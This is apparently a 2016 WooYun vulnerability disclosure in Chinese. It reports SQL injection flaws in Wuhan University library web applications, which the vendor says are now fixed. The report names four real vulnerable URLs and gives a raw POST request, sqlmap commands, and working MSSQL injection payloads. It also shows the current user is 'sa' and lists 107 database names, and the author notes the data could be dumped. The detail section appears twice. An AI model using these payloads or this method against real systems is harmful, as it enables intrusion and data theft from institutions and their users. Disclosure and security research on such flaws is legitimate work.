当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0171662

漏洞标题:武汉大学某分站存在多个sql注入

相关厂商:武汉大学

漏洞作者: Mayter

提交时间:2016-01-24 15:04

修复时间:2016-01-31 09:55

公开时间:2016-01-31 09:55

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-24: 细节已通知厂商并且等待厂商处理中
2016-01-25: 厂商已经确认,细节仅向厂商公开
2016-01-31: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

武汉大学某分站存在多个sql注入

详细说明:

注入1.http://apps.lib.whu.edu.cn/newbook/show.asp?a=631622
注入2.http://apps.lib.whu.edu.cn/skdh/xx/expert.asp?f_type=1
注入3.http://apps.lib.whu.edu.cn/skdh/gj/t_elib.asp?a=2
注入4.http://apps.lib.whu.edu.cn/jcxt/smkx.asp

POST /jcxt/smkx.asp HTTP/1.1
Host: apps.lib.whu.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ASPSESSIONIDSARBSQDA=KBLGIJNDIILEFJHDLKKKKFII
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
sbtquery=%EF%BF%BD%EF%BF%BD%D1%AF&i=enname&txtkeywords=88952634


1.png


root@kail:~# sqlmap -u "http://apps.lib.whu.edu.cn/newbook/show.asp?a=631622" --dbs --current-db --current-user
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201512110967}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 15:17:57
[15:17:57] [INFO] resuming back-end DBMS 'microsoft sql server'
[15:18:02] [INFO] testing connection to the target URL
[15:18:08] [INFO] heuristics detected web page charset 'ISO-8859-2'
[15:18:08] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: a (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: a=631622 AND 7095=7095
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: a=631622 AND 5528=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(98)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5528=5528) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(113)+CHAR(113)))
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: a=(SELECT CHAR(113)+CHAR(106)+CHAR(98)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (6508=6508) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(113)+CHAR(113))
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: a=631622;WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: a=631622 WAITFOR DELAY '0:0:5'
---
[15:18:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[15:18:08] [INFO] fetching current user
[15:18:08] [INFO] resumed: sa
current user: 'sa'
[15:18:08] [INFO] fetching current database
[15:18:08] [INFO] resumed: db_newbooks_new
current database: 'db_newbooks_new'
[15:18:08] [INFO] fetching database names


available databases [107]:
[*] aspnuke
[*] bbsxp6
[*] book
[*] bslw
[*] bts
[*] cadal_metadata
[*] cadal_metadata_full
[*] cadal_metadata_xiwen
[*] cceu
[*] chaox
[*] chaxin
[*] chwz
[*] club610
[*] cn_books
[*] cnki1
[*] culture
[*] db_newbooks
[*] db_newbooks_new
[*] dgxz
[*] dgxz1
[*] distmodel
[*] dsource
[*] dwlt
[*] dzqk
[*] dzsy
[*] e_mag
[*] fgxx
[*] fgxx-1
[*] filmtest
[*] freebbs
[*] gjf
[*] gjg
[*] gljc
[*] gxcfbf
[*] haixia
[*] hbdlib
[*] hbdlib-tj
[*] hjf
[*] hongtest
[*] huanjing
[*] ill
[*] iri
[*] its
[*] jcxt
[*] jiaoc
[*] jiaocan
[*] jinji
[*] km_words
[*] kouqiang
[*] lecture
[*] lecture2008
[*] library
[*] library12
[*] libuser
[*] lw_metadata
[*] maintain
[*] master
[*] meiti
[*] model
[*] msdb
[*] music
[*] music1
[*] mytest
[*] navigation
[*] nbw
[*] newq
[*] news
[*] newsoftroom
[*] Northwind
[*] odeum
[*] peixun
[*] pubs
[*] pxread
[*] reader
[*] sbgl
[*] sci
[*] sci_test
[*] sfx_export
[*] sjs
[*] slgc_calis3_tsk
[*] social
[*] softroom
[*] sound
[*] suishu
[*] suishubak
[*] sustc
[*] teach
[*] tempdb
[*] test_news
[*] tinale
[*] tsjg
[*] tydata
[*] users
[*] vrs
[*] vrs_kj
[*] wanhua
[*] web
[*] web201301
[*] web2014
[*] webold
[*] whu_book
[*] whu_users
[*] wxcd
[*] xgjs
[*] yingyue
[*] yytd
[*] zgits
[15:18:13] [INFO] fetched data logged to text files under '/root/.sqlmap/output/apps.lib.whu.edu.cn'


107个数据库,就不注入出数据了可以脱裤的。

漏洞证明:

注入1.http://apps.lib.whu.edu.cn/newbook/show.asp?a=631622
注入2.http://apps.lib.whu.edu.cn/skdh/xx/expert.asp?f_type=1
注入3.http://apps.lib.whu.edu.cn/skdh/gj/t_elib.asp?a=2
注入4.http://apps.lib.whu.edu.cn/jcxt/smkx.asp

POST /jcxt/smkx.asp HTTP/1.1
Host: apps.lib.whu.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ASPSESSIONIDSARBSQDA=KBLGIJNDIILEFJHDLKKKKFII
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
sbtquery=%EF%BF%BD%EF%BF%BD%D1%AF&i=enname&txtkeywords=88952634


1.png


root@kail:~# sqlmap -u "http://apps.lib.whu.edu.cn/newbook/show.asp?a=631622" --dbs --current-db --current-user
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201512110967}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 15:17:57
[15:17:57] [INFO] resuming back-end DBMS 'microsoft sql server'
[15:18:02] [INFO] testing connection to the target URL
[15:18:08] [INFO] heuristics detected web page charset 'ISO-8859-2'
[15:18:08] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: a (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: a=631622 AND 7095=7095
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: a=631622 AND 5528=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(98)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5528=5528) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(113)+CHAR(113)))
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: a=(SELECT CHAR(113)+CHAR(106)+CHAR(98)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (6508=6508) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(113)+CHAR(113))
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: a=631622;WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: a=631622 WAITFOR DELAY '0:0:5'
---
[15:18:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[15:18:08] [INFO] fetching current user
[15:18:08] [INFO] resumed: sa
current user: 'sa'
[15:18:08] [INFO] fetching current database
[15:18:08] [INFO] resumed: db_newbooks_new
current database: 'db_newbooks_new'
[15:18:08] [INFO] fetching database names


available databases [107]:
[*] aspnuke
[*] bbsxp6
[*] book
[*] bslw
[*] bts
[*] cadal_metadata
[*] cadal_metadata_full
[*] cadal_metadata_xiwen
[*] cceu
[*] chaox
[*] chaxin
[*] chwz
[*] club610
[*] cn_books
[*] cnki1
[*] culture
[*] db_newbooks
[*] db_newbooks_new
[*] dgxz
[*] dgxz1
[*] distmodel
[*] dsource
[*] dwlt
[*] dzqk
[*] dzsy
[*] e_mag
[*] fgxx
[*] fgxx-1
[*] filmtest
[*] freebbs
[*] gjf
[*] gjg
[*] gljc
[*] gxcfbf
[*] haixia
[*] hbdlib
[*] hbdlib-tj
[*] hjf
[*] hongtest
[*] huanjing
[*] ill
[*] iri
[*] its
[*] jcxt
[*] jiaoc
[*] jiaocan
[*] jinji
[*] km_words
[*] kouqiang
[*] lecture
[*] lecture2008
[*] library
[*] library12
[*] libuser
[*] lw_metadata
[*] maintain
[*] master
[*] meiti
[*] model
[*] msdb
[*] music
[*] music1
[*] mytest
[*] navigation
[*] nbw
[*] newq
[*] news
[*] newsoftroom
[*] Northwind
[*] odeum
[*] peixun
[*] pubs
[*] pxread
[*] reader
[*] sbgl
[*] sci
[*] sci_test
[*] sfx_export
[*] sjs
[*] slgc_calis3_tsk
[*] social
[*] softroom
[*] sound
[*] suishu
[*] suishubak
[*] sustc
[*] teach
[*] tempdb
[*] test_news
[*] tinale
[*] tsjg
[*] tydata
[*] users
[*] vrs
[*] vrs_kj
[*] wanhua
[*] web
[*] web201301
[*] web2014
[*] webold
[*] whu_book
[*] whu_users
[*] wxcd
[*] xgjs
[*] yingyue
[*] yytd
[*] zgits
[15:18:13] [INFO] fetched data logged to text files under '/root/.sqlmap/output/apps.lib.whu.edu.cn'


107个数据库,就不注入出数据了可以脱裤的。

修复方案:

。。

版权声明:转载请注明来源 Mayter@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2016-01-25 09:57

厂商回复:

已经通知相关单位

最新状态:

2016-01-31:已经处理